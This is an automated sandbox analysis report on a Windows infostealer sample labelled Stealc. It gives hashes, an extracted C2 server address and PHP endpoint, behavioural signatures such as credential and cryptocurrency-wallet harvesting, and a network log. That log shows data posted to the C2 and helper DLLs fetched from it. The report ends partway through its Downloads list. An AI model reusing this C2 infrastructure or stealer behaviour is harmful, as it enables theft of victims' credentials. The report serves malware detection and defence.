Analysis

  • max time kernel
    94s
  • max time network
    96s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-10-2024 06:21

General

  • Target

    9714d301c8b96c7263dea4a36ddbdf74896d31f648d2836fa2d2642dccca17e8.exe

  • Size

    493KB

  • MD5

    7c6083bf70e2919d0957ffcb7b75ebeb

  • SHA1

    89254f92c908c0d99d150649aab4fdea7fc10b34

  • SHA256

    9714d301c8b96c7263dea4a36ddbdf74896d31f648d2836fa2d2642dccca17e8

  • SHA512

    ba7c4f25f83cfde35252920821707322e3523b3e47bb221239082fce3e3eb6811d302a24c1583bed3d8ddb54a6bb3e99ee6d2c5d3d2f5425ded550b82bcf16e8

  • SSDEEP

    12288:PtVE8S9QVK+gLgDWuaQ3HQ0RJaE5hZVQgqt2oRAAn4S:PfS9RkKO3w0RJaOQgq0oRAA4

Malware Config

Extracted

Family

stealc

Botnet

default

C2

http://46.8.231.109

Attributes
  • url_path

    /c4754d4f680ead72.php

Signatures

  • Stealc

    Stealc is an infostealer written in C++.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 2 IoCs
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\9714d301c8b96c7263dea4a36ddbdf74896d31f648d2836fa2d2642dccca17e8.exe
    "C:\Users\Admin\AppData\Local\Temp\9714d301c8b96c7263dea4a36ddbdf74896d31f648d2836fa2d2642dccca17e8.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3320
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:844
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\IIJEBAECGC.exe"
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:212
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 236
      2⤵
      • Program crash
      PID:4884
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3320 -ip 3320
    1⤵
      PID:1956

    Network

    • flag-cz
      GET
      http://46.8.231.109/
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      GET / HTTP/1.1
      Host: 46.8.231.109
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 06:21:49 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Content-Length: 0
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-cz
      POST
      http://46.8.231.109/c4754d4f680ead72.php
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      POST /c4754d4f680ead72.php HTTP/1.1
      Content-Type: multipart/form-data; boundary=----CAAAAFBKFIECAAKECGCA
      Host: 46.8.231.109
      Content-Length: 214
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 06:21:49 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Vary: Accept-Encoding
      Content-Length: 180
      Keep-Alive: timeout=5, max=99
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-cz
      POST
      http://46.8.231.109/c4754d4f680ead72.php
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      POST /c4754d4f680ead72.php HTTP/1.1
      Content-Type: multipart/form-data; boundary=----KECBGCGCGIEGCBFHIIEB
      Host: 46.8.231.109
      Content-Length: 268
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 06:21:49 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Vary: Accept-Encoding
      Content-Length: 1520
      Keep-Alive: timeout=5, max=98
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-cz
      POST
      http://46.8.231.109/c4754d4f680ead72.php
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      POST /c4754d4f680ead72.php HTTP/1.1
      Content-Type: multipart/form-data; boundary=----BAAEHDBFIDAFIDHJEBFB
      Host: 46.8.231.109
      Content-Length: 267
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 06:21:49 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Vary: Accept-Encoding
      Content-Length: 7116
      Keep-Alive: timeout=5, max=97
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-cz
      POST
      http://46.8.231.109/c4754d4f680ead72.php
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      POST /c4754d4f680ead72.php HTTP/1.1
      Content-Type: multipart/form-data; boundary=----GIJKKKFCFHCFIECBGDHI
      Host: 46.8.231.109
      Content-Length: 268
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 06:21:49 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Vary: Accept-Encoding
      Content-Length: 108
      Keep-Alive: timeout=5, max=96
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-cz
      POST
      http://46.8.231.109/c4754d4f680ead72.php
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      POST /c4754d4f680ead72.php HTTP/1.1
      Content-Type: multipart/form-data; boundary=----GDAEBKJDHDAFIECBAKKJ
      Host: 46.8.231.109
      Content-Length: 4695
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 06:21:50 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Content-Length: 0
      Keep-Alive: timeout=5, max=95
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-cz
      GET
      http://46.8.231.109/1309cdeb8f4c8736/sqlite3.dll
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1
      Host: 46.8.231.109
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 06:21:50 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT
      ETag: "10e436-5e7eeebed8d80"
      Accept-Ranges: bytes
      Content-Length: 1106998
      Content-Type: application/x-msdos-program
    • flag-cz
      POST
      http://46.8.231.109/c4754d4f680ead72.php
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      POST /c4754d4f680ead72.php HTTP/1.1
      Content-Type: multipart/form-data; boundary=----HJKKFIJKFCAKJJJKJKFI
      Host: 46.8.231.109
      Content-Length: 723
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 06:21:51 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Content-Length: 0
      Keep-Alive: timeout=5, max=93
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-cz
      POST
      http://46.8.231.109/c4754d4f680ead72.php
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      POST /c4754d4f680ead72.php HTTP/1.1
      Content-Type: multipart/form-data; boundary=----KFCFIEHCFIECBGCBFHIJ
      Host: 46.8.231.109
      Content-Length: 363
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 06:21:51 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Content-Length: 0
      Keep-Alive: timeout=5, max=92
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-cz
      POST
      http://46.8.231.109/c4754d4f680ead72.php
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      POST /c4754d4f680ead72.php HTTP/1.1
      Content-Type: multipart/form-data; boundary=----BAFCFHDHIIIECBGCAKFI
      Host: 46.8.231.109
      Content-Length: 363
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 06:21:51 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Content-Length: 0
      Keep-Alive: timeout=5, max=91
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-cz
      GET
      http://46.8.231.109/1309cdeb8f4c8736/freebl3.dll
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1
      Host: 46.8.231.109
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 06:21:51 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
      ETag: "a7550-5e7ebd4425100"
      Accept-Ranges: bytes
      Content-Length: 685392
      Content-Type: application/x-msdos-program
    • flag-cz
      GET
      http://46.8.231.109/1309cdeb8f4c8736/mozglue.dll
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      GET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1
      Host: 46.8.231.109
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 06:21:51 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
      ETag: "94750-5e7ebd4425100"
      Accept-Ranges: bytes
      Content-Length: 608080
      Content-Type: application/x-msdos-program
    • flag-cz
      GET
      http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1
      Host: 46.8.231.109
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 06:21:52 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
      ETag: "6dde8-5e7ebd4425100"
      Accept-Ranges: bytes
      Content-Length: 450024
      Content-Type: application/x-msdos-program
    • flag-cz
      GET
      http://46.8.231.109/1309cdeb8f4c8736/nss3.dll
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1
      Host: 46.8.231.109
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 06:21:52 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
      ETag: "1f3950-5e7ebd4425100"
      Accept-Ranges: bytes
      Content-Length: 2046288
      Content-Type: application/x-msdos-program
    • flag-cz
      GET
      http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1
      Host: 46.8.231.109
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 06:21:52 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
      ETag: "3ef50-5e7ebd4425100"
      Accept-Ranges: bytes
      Content-Length: 257872
      Content-Type: application/x-msdos-program
    • flag-cz
      GET
      http://46.8.231.109/1309cdeb8f4c8736/vcruntime140.dll
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      GET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1
      Host: 46.8.231.109
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 06:21:53 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
      ETag: "13bf0-5e7ebd4425100"
      Accept-Ranges: bytes
      Content-Length: 80880
      Content-Type: application/x-msdos-program
    • flag-cz
      POST
      http://46.8.231.109/c4754d4f680ead72.php
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      POST /c4754d4f680ead72.php HTTP/1.1
      Content-Type: multipart/form-data; boundary=----IJDHDGDAAAAKFIDGHJDG
      Host: 46.8.231.109
      Content-Length: 947
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 06:21:53 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Content-Length: 0
      Keep-Alive: timeout=5, max=84
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-cz
      POST
      http://46.8.231.109/c4754d4f680ead72.php
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      POST /c4754d4f680ead72.php HTTP/1.1
      Content-Type: multipart/form-data; boundary=----CFBFHIEBKJKFHIEBFBAE
      Host: 46.8.231.109
      Content-Length: 267
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 06:21:53 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Vary: Accept-Encoding
      Content-Length: 2408
      Keep-Alive: timeout=5, max=83
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-cz
      POST
      http://46.8.231.109/c4754d4f680ead72.php
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      POST /c4754d4f680ead72.php HTTP/1.1
      Content-Type: multipart/form-data; boundary=----DHCGHDHIDHCBGCBGCAEB
      Host: 46.8.231.109
      Content-Length: 265
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 06:21:53 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Content-Length: 0
      Keep-Alive: timeout=5, max=82
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-cz
      POST
      http://46.8.231.109/c4754d4f680ead72.php
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      POST /c4754d4f680ead72.php HTTP/1.1
      Content-Type: multipart/form-data; boundary=----HIEHDAFHDHCBFIDGCFID
      Host: 46.8.231.109
      Content-Length: 363
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 06:21:53 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Content-Length: 0
      Keep-Alive: timeout=5, max=81
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-cz
      POST
      http://46.8.231.109/c4754d4f680ead72.php
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      POST /c4754d4f680ead72.php HTTP/1.1
      Content-Type: multipart/form-data; boundary=----ECBAEBGHDAECBGDGCAKE
      Host: 46.8.231.109
      Content-Length: 272
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 06:21:53 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Vary: Accept-Encoding
      Content-Length: 96
      Keep-Alive: timeout=5, max=80
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-cz
      POST
      http://46.8.231.109/c4754d4f680ead72.php
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      POST /c4754d4f680ead72.php HTTP/1.1
      Content-Type: multipart/form-data; boundary=----AAEGHJKJKKJDHIDHJKJD
      Host: 46.8.231.109
      Content-Length: 272
      Connection: Keep-Alive
      Cache-Control: no-cache
    • flag-us
      DNS
      g.bing.com
      Remote address:
      8.8.8.8:53
      Request
      g.bing.com
      IN A
      Response
      g.bing.com
      IN CNAME
      g-bing-com.ax-0001.ax-msedge.net
      g-bing-com.ax-0001.ax-msedge.net
      IN CNAME
      ax-0001.ax-msedge.net
      ax-0001.ax-msedge.net
      IN A
      150.171.28.10
      ax-0001.ax-msedge.net
      IN A
      150.171.27.10
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=4ea9b7972a7c4a64acc2cd1484139d1a&localId=w:E8C31A05-90CA-DE8F-A29D-2E3C02D092EA&deviceId=6966572651686081&anid=
      Remote address:
      150.171.28.10:443
      Request
      GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=4ea9b7972a7c4a64acc2cd1484139d1a&localId=w:E8C31A05-90CA-DE8F-A29D-2E3C02D092EA&deviceId=6966572651686081&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      set-cookie: MUID=2FE89280B2C8675428E18794B30A660F; domain=.bing.com; expires=Tue, 04-Nov-2025 06:21:49 GMT; path=/; SameSite=None; Secure; Priority=High;
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 69837CB0C01349A695C7F8FF0CF670B1 Ref B: LON601060105060 Ref C: 2024-10-10T06:21:49Z
      date: Thu, 10 Oct 2024 06:21:49 GMT
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=4ea9b7972a7c4a64acc2cd1484139d1a&localId=w:E8C31A05-90CA-DE8F-A29D-2E3C02D092EA&deviceId=6966572651686081&anid=
      Remote address:
      150.171.28.10:443
      Request
      GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=4ea9b7972a7c4a64acc2cd1484139d1a&localId=w:E8C31A05-90CA-DE8F-A29D-2E3C02D092EA&deviceId=6966572651686081&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      cookie: MUID=2FE89280B2C8675428E18794B30A660F
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      set-cookie: MSPTC=WQH1mNrpRlIGV_U8oWja8vgtTw9KUsoDhk_LMPr3slY; domain=.bing.com; expires=Tue, 04-Nov-2025 06:21:50 GMT; path=/; Partitioned; secure; SameSite=None
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: DBEC943E8F144DB38C26602E690A1BB4 Ref B: LON601060105060 Ref C: 2024-10-10T06:21:50Z
      date: Thu, 10 Oct 2024 06:21:49 GMT
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=4ea9b7972a7c4a64acc2cd1484139d1a&localId=w:E8C31A05-90CA-DE8F-A29D-2E3C02D092EA&deviceId=6966572651686081&anid=
      Remote address:
      150.171.28.10:443
      Request
      GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=4ea9b7972a7c4a64acc2cd1484139d1a&localId=w:E8C31A05-90CA-DE8F-A29D-2E3C02D092EA&deviceId=6966572651686081&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      cookie: MUID=2FE89280B2C8675428E18794B30A660F; MSPTC=WQH1mNrpRlIGV_U8oWja8vgtTw9KUsoDhk_LMPr3slY
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: A1BA6CC0B58442B18D09B7E52B7C7208 Ref B: LON601060105060 Ref C: 2024-10-10T06:21:50Z
      date: Thu, 10 Oct 2024 06:21:49 GMT
    • flag-us
      DNS
      109.231.8.46.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      109.231.8.46.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      68.159.190.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      68.159.190.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      88.210.23.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      88.210.23.2.in-addr.arpa
      IN PTR
      Response
      88.210.23.2.in-addr.arpa
      IN PTR
      a2-23-210-88deploystaticakamaitechnologiescom
    • flag-us
      DNS
      95.221.229.192.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      95.221.229.192.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      55.36.223.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      55.36.223.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      nsdm.cumpar-auto-orice-tip.ro
      MSBuild.exe
      Remote address:
      8.8.8.8:53
      Request
      nsdm.cumpar-auto-orice-tip.ro
      IN A
      Response
    • flag-us
      DNS
      212.20.149.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      212.20.149.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      18.31.95.13.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      18.31.95.13.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      103.209.201.84.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      103.209.201.84.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      83.210.23.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      83.210.23.2.in-addr.arpa
      IN PTR
      Response
      83.210.23.2.in-addr.arpa
      IN PTR
      a2-23-210-83deploystaticakamaitechnologiescom
    • flag-us
      DNS
      83.210.23.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      83.210.23.2.in-addr.arpa
      IN PTR
    • flag-us
      DNS
      30.243.111.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      30.243.111.52.in-addr.arpa
      IN PTR
      Response
    • 46.8.231.109:80
      http://46.8.231.109/c4754d4f680ead72.php
      http
      MSBuild.exe
      210.3kB
      5.4MB
      3920
      3907

      HTTP Request

      GET http://46.8.231.109/

      HTTP Response

      200

      HTTP Request

      POST http://46.8.231.109/c4754d4f680ead72.php

      HTTP Response

      200

      HTTP Request

      POST http://46.8.231.109/c4754d4f680ead72.php

      HTTP Response

      200

      HTTP Request

      POST http://46.8.231.109/c4754d4f680ead72.php

      HTTP Response

      200

      HTTP Request

      POST http://46.8.231.109/c4754d4f680ead72.php

      HTTP Response

      200

      HTTP Request

      POST http://46.8.231.109/c4754d4f680ead72.php

      HTTP Response

      200

      HTTP Request

      GET http://46.8.231.109/1309cdeb8f4c8736/sqlite3.dll

      HTTP Response

      200

      HTTP Request

      POST http://46.8.231.109/c4754d4f680ead72.php

      HTTP Response

      200

      HTTP Request

      POST http://46.8.231.109/c4754d4f680ead72.php

      HTTP Response

      200

      HTTP Request

      POST http://46.8.231.109/c4754d4f680ead72.php

      HTTP Response

      200

      HTTP Request

      GET http://46.8.231.109/1309cdeb8f4c8736/freebl3.dll

      HTTP Response

      200

      HTTP Request

      GET http://46.8.231.109/1309cdeb8f4c8736/mozglue.dll

      HTTP Response

      200

      HTTP Request

      GET http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll

      HTTP Response

      200

      HTTP Request

      GET http://46.8.231.109/1309cdeb8f4c8736/nss3.dll

      HTTP Response

      200

      HTTP Request

      GET http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll

      HTTP Response

      200

      HTTP Request

      GET http://46.8.231.109/1309cdeb8f4c8736/vcruntime140.dll

      HTTP Response

      200

      HTTP Request

      POST http://46.8.231.109/c4754d4f680ead72.php

      HTTP Response

      200

      HTTP Request

      POST http://46.8.231.109/c4754d4f680ead72.php

      HTTP Response

      200

      HTTP Request

      POST http://46.8.231.109/c4754d4f680ead72.php

      HTTP Response

      200

      HTTP Request

      POST http://46.8.231.109/c4754d4f680ead72.php

      HTTP Response

      200

      HTTP Request

      POST http://46.8.231.109/c4754d4f680ead72.php

      HTTP Response

      200

      HTTP Request

      POST http://46.8.231.109/c4754d4f680ead72.php
    • 150.171.28.10:443
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=4ea9b7972a7c4a64acc2cd1484139d1a&localId=w:E8C31A05-90CA-DE8F-A29D-2E3C02D092EA&deviceId=6966572651686081&anid=
      tls, http2
      2.0kB
      9.4kB
      22
      19

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=4ea9b7972a7c4a64acc2cd1484139d1a&localId=w:E8C31A05-90CA-DE8F-A29D-2E3C02D092EA&deviceId=6966572651686081&anid=

      HTTP Response

      204

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=4ea9b7972a7c4a64acc2cd1484139d1a&localId=w:E8C31A05-90CA-DE8F-A29D-2E3C02D092EA&deviceId=6966572651686081&anid=

      HTTP Response

      204

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=4ea9b7972a7c4a64acc2cd1484139d1a&localId=w:E8C31A05-90CA-DE8F-A29D-2E3C02D092EA&deviceId=6966572651686081&anid=

      HTTP Response

      204
    • 8.8.8.8:53
      g.bing.com
      dns
      56 B
      148 B
      1
      1

      DNS Request

      g.bing.com

      DNS Response

      150.171.28.10
      150.171.27.10

    • 8.8.8.8:53
      109.231.8.46.in-addr.arpa
      dns
      71 B
      131 B
      1
      1

      DNS Request

      109.231.8.46.in-addr.arpa

    • 8.8.8.8:53
      68.159.190.20.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      68.159.190.20.in-addr.arpa

    • 8.8.8.8:53
      88.210.23.2.in-addr.arpa
      dns
      70 B
      133 B
      1
      1

      DNS Request

      88.210.23.2.in-addr.arpa

    • 8.8.8.8:53
      95.221.229.192.in-addr.arpa
      dns
      73 B
      144 B
      1
      1

      DNS Request

      95.221.229.192.in-addr.arpa

    • 8.8.8.8:53
      55.36.223.20.in-addr.arpa
      dns
      71 B
      157 B
      1
      1

      DNS Request

      55.36.223.20.in-addr.arpa

    • 8.8.8.8:53
      nsdm.cumpar-auto-orice-tip.ro
      dns
      MSBuild.exe
      75 B
      140 B
      1
      1

      DNS Request

      nsdm.cumpar-auto-orice-tip.ro

    • 8.8.8.8:53
      212.20.149.52.in-addr.arpa
      dns
      72 B
      146 B
      1
      1

      DNS Request

      212.20.149.52.in-addr.arpa

    • 8.8.8.8:53
      18.31.95.13.in-addr.arpa
      dns
      70 B
      144 B
      1
      1

      DNS Request

      18.31.95.13.in-addr.arpa

    • 8.8.8.8:53
      103.209.201.84.in-addr.arpa
      dns
      73 B
      133 B
      1
      1

      DNS Request

      103.209.201.84.in-addr.arpa

    • 8.8.8.8:53
      83.210.23.2.in-addr.arpa
      dns
      140 B
      133 B
      2
      1

      DNS Request

      83.210.23.2.in-addr.arpa

      DNS Request

      83.210.23.2.in-addr.arpa

    • 8.8.8.8:53
      30.243.111.52.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      30.243.111.52.in-addr.arpa

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\mozglue.dll

      Filesize

      593KB

      MD5

      c8fd9be83bc728cc04beffafc2907fe9

      SHA1

      95ab9f701e0024cedfbd312bcfe4e726744c4f2e

      SHA256

      ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

      SHA512

